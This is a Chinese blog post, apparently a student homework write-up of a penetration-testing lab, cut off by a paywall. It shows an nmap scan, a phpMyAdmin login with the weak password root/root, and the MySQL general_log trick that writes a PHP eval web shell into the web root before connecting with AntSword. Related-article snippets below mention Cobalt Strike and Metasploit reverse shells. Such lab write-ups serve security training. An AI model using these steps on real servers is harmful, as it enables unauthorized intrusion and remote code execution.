第二周渗透测试靶场实践

最新推荐文章于 2024-04-12 10:10:19 发布
最新推荐文章于 2024-04-12 10:10:19 发布
阅读量725 收藏
点赞数
分类专栏: 作业 文章标签: 数据库 mysql jenkins
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51777190/article/details/120729586
版权
本文详细记录了一次渗透测试的过程,从信息收集(端口扫描、漏洞利用)到后渗透阶段(反弹shell、提权),再到利用cs与msf设置代理,深入内网进行信息收集,并最终获取内网主机权限。涉及技术包括nmap、phpMyadmin弱口令、YXCMS漏洞、蚁剑、msfvenom、Meterpreter、CS(Cobalt Strike)等。
摘要由CSDN通过智能技术生成

第二周渗透测试靶场实践

信息收集

扫描端口

  • 靶场地址:10.203.87.175
  • nmap -sS -sV -A 10.203.87.175

请添加图片描述

  • 开了80端口,浏览器打开

请添加图片描述

  • 发现备份文件,点击备份文件,解压

请添加图片描述

  • 打开每个文件看看

请添加图片描述

  • 有可能是网站中刚打开的YXCMS,回到网站,点击XYCMS

请添加图片描述

漏洞利用

phpMyadmin

请添加图片描述

  • 通过弱口令root/root进入

请添加图片描述

  • select @@basedir; //查询路径

请添加图片描述

  • show global variables like ‘%general%’; //查看general*值

请添加图片描述

  • general_log为OFF
  • set global general_log=on; //开启日志

请添加图片描述- 再次看一遍日志

请添加图片描述

  • set global general_log_file=‘C:/phpstudy/www/llljy.php’; //设置日志存放文件

请添加图片描述

  • select ‘<?php eval($_POST["nnn"]);?>’ //执行语句,会写入我们设置的llljy.php中

请添加图片描述

  • 蚁剑连接

最低0.47元/天 解锁文章
「已注销」
关注
专栏目录
XYCMS搬家公司建站系统 v2.4
12-07
XYCMS搬家公司建站系统模板 系统栏目功能介绍 公司信息管理:包括基本信息管理,添加,在线咨询信息管理,在线回复咨询信息 新闻资讯管理:管理新闻信息内容,管理相关分类,添加或者删除 服务项目管理:对服务项目,领域进行管理,发布信息,管理信息。 网页
多节点靶场(1)--Yxcms靶场分析
u012335061的博客
11-22 3062
**** 多节点靶场(1)–Yxcms靶场分析** **链接: 任务:找找flag,一共有三个: 已经知道是yxcms,可以去网上看一下,这个cms爆出过什么漏洞,可以复现一下 Yxcms登录后台地址:http://192.168.100.130/index.php?r=admin/index/login Yxcms后台登录页面存在弱口令,默认用户密码是...
红队隧道应用篇之CS正反向连接突破内网(二)
xf555er的博客
12-08 1468
在CS客户端新建一个TCP协议的监听, 监听端口为创建无状态木马(Windows Executable(S)), 选择上述建立的TCP监听器, 随后将无状态木马放到不出网的内网主机中去运行, 运行后内网主机就会监听本机的4444端口在web服务器的beacon命令行输入: , 来正向连接内网主机, 随后内网主机在CS上线若内网主机上部署了防火墙, 那么正向连接很可能会被防火墙拦截掉, 为了解决这一问题可以采用反向连接反向连接可以突破防护墙的拦截, 这是因为这是从内网主机反向连接出站的在Web服务器新建一
厉害了,上次我见过这么厉害的安全测试实战还是上次
Androidyuexia的博客
12-08 852
01概念介绍 1.1 xss XSS 攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是 JavaScript,但实际上也可以包括 Java、 VBScript、ActiveX、 Flash 或者甚至是普通的 HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和 cookie 等各种内容。 参考资料:百度百科 1.2 pr 提权 PR 提权利用 Win
CS与MSF联动/shell互相反弹
最新发布
qq_59468567的博客
04-12 395
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true。set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的。先建立一个监听器,和msf的要一一对应,上面的ip必须是可以ping通的大部分情况是外网ip。此处标红的对应下面的两个,取决加不加。然后返回前面的增加会话。
web安全渗透测试.7z
04-08
9. **靶场源码** - 仿真Web应用,用于练习和测试渗透测试技术,提供安全漏洞的环境。 10. **轻量WEB指纹识别** - 可能是指一款轻便的Web服务器指纹识别工具,用于识别目标Web服务器的类型和版本,这在规划渗透测试...
二号靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
DVWA靶场,集成了owasp top 10漏洞
03-28
通过DVWA靶场的学习,你可以深入了解这些漏洞,提升自己的渗透测试技能,并了解如何为实际环境中的Web应用程序构建更强大的安全防护。同时,对于开发人员来说,这是一个绝佳的平台,可以用来增强对安全编码的理解,...
CSRF的脚本,可以做测试使用.zip
05-28
5. 渗透测试的重要性: 通过像"CSRF的脚本,可以做测试使用.zip"这样的资源,安全从业者可以模拟攻击,找出系统中的CSRF漏洞,从而提前修复,提高系统的安全性。同时,这也提醒我们,进行任何安全测试都应在合法的...
小迪WEB
热门推荐
weixin_52125240的博客
09-26 2万+
WEB-学习小迪安全第01天:基础入门—概念名词域名 小迪安全 第01天:基础入门—概念名词 域名 1)什么是域名? 域名,是由一串用点分割的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时计算机的电子方位; 例如:www.bilibili.com 2)域名在哪里注册? 在第三方平台上注册,国内的一些域名注册商,比如阿里云旗下的万网。 3)什么是二级域名多级域名? 二级域名:顶级域名之下的域名。 例如: www.baidu.com为主域,则图中news.baidu.com为二级域
CS上线Linux--坑太多了
em.....
05-31 3240
CS上线Linux–坑太多了 文章目录CS上线Linux--坑太多了1.1 前期准备1.2 安装1.3 反弹shell 传统的Cs只能上线windows,而有时为了方便想将Linux主机上线到Cs,这个时候就需要使用CrossC2插件 1.1 前期准备 #下载指定版本 https://github.com/gloxec/CrossC2/releases/tag/v2.2.4 我这里在Windows上展示,所以下的Windows 然后下载cna **下载地址:**https://github.com.
第19篇:关于近期cs服务端被反打的原因分析
ABC_123的博客
08-08 1784
Part1 前言最近几天,不少朋友的cs服务端被反打了,相信很多网友都知道了,大家也都在讨论,各种各样说法都有。具体事件描述如下:部分网友的cs服务端被不明攻击者拿下权限,之后攻击者将cs上的shell全部通过云函数的方式反弹到自己的cs上,之后将原有cs端的shell权限清空,在cs控制台留下一句话“CS RCE全版本通杀 Please v Me 获取详情”等之类的...
内网安全:Cobalt Strike 工具 渗透多层内网主机.(正向 || 反向)
网络安全领域___专研者.
06-03 2609
Cobalt Strike是一款以metasploit为基础的GUI的框架式渗透工具,又被业界人称为CS。拥有多种协议主机上线方式,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,winexe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等.
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-28 3409
利用CrossC2插件工具,将Linux系统的shell反弹回Cobalt_Strike,方便后续的内网渗透。用CrossC2来反弹Linux主机shell给内网渗透工具Cobalt Strike(cs)。
yxcms弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 2117
yxcms弱口令至getshell 漏洞复现
【渗透实战系列】xycms的一次漏洞挖掘
书山上的云的博客
10-13 913
本次漏洞挖掘是用于记录某次实验中自建CMS靶场的漏洞挖掘情况。
靶场环境搭建
qq_21696621的博客
10-24 2150
一、安装VM虚拟机(本人使用VMware Workstation Pro 15.5.0 build-14665864) 二、下载win10镜像并创建好虚拟机(cn_windows_10_multiple_editions_x64_dvd_6848463.iso)https://msdn.itellyou.cn/ 三、在win10虚拟机安装phpstudy_pro(php集成环境)、aspweb...
如何查看端口是被哪个程序占用的
weixin_63577740的博客
09-24 1万+
查看端口
web渗透测试靶场cms
09-06
你可以尝试一些知名的Web渗透测试靶场CMS,如DVWA(Damn Vulnerable Web Application)、OWASP Juice Shop和WebGoat。这些靶场CMS都是为了帮助安全专业人员和开发者学习和实践Web渗透测试技术而设计的,它们提供了各种漏洞和安全问题供你尝试攻击和修复。 DVWA是一个非常受欢迎的靶场CMS,它包含了多个安全漏洞,例如SQL注入、跨站脚本攻击(XSS)和文件上传漏洞等。OWASP Juice Shop是一个现代化的Web应用程序,旨在模拟真实世界中常见的安全问题。WebGoat是另一个非常受欢迎的靶场CMS,它提供了一系列挑战和实验,帮助你学习各种Web应用程序漏洞。 通过使用这些靶场CMS,你可以积极主动地学习和测试不同类型的Web应用程序漏洞,提高你的渗透测试技能。记得在使用靶场CMS进行渗透测试时,要遵守法律和道德规范,并且只在合法的环境中进行测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值